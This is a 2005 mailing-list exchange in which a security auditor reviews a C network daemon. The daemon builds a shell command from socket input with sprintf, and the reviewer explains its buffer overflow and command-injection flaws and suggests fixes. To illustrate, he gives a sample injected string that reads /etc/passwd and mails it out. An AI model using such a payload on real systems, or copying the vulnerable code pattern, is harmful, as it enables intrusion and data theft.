Yep, thats a good point, that I havent realized. The security stuff is very very important.
I have to change the code to be able to manage this problems. This is the next step. Thanks for your advice ;-) Sergio Cuellar Valdes On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <[EMAIL PROTECTED]> wrote: > On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote: > > Marc, thanks that was the problem !!! > > > > sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big > > big big mistake > > It certainly was. > > > I added the hole path to the instructions: > > > > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer); > > > > Thanks to all of you who helped me !! :-) > > You deamonize. You open a socket. You read input from that > socket - carefully avoiding buffer overflows - then you run the > command: > > /usr/local/bin/say -s 4 -a "the text you read" > > Firstly you don't avoid a simple buffer overflow. Although > you have two buffers, 'buffer' for receiving the message from > the network and 'message' for running the command are both the > same size you don't account for the extra characters when you're > copying: > > sprintf(message, "say -s 4 -a \"%s\"", buffer); > > At least change that to: > > snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer); > > Secondly, and this is the biggie, you don't quote or process the > characters which are read from the network. > > Consider what would happen if a malicious user sent this: > > "; cat /etc/passwd | mail [EMAIL PROTECTED] ; echo " > > You would run this commend: > > /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo "" > > Effectively you're allowing any user who can connect to your server > to execute arbitary commands. If this is started by init you're likely > running as root too. > > Check that the characters you read from the network are only > [a-zA-Z ] and you're probably OK. > > Steve > -- > # The Debian Security Audit Project. > http://www.debian.org/security/audit > > -- "Meine Hoffnung soll mich leiten Durch die Tage ohne Dich Und die Liebe soll mich tragen Wenn der Schmerz die Hoffnung bricht" -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
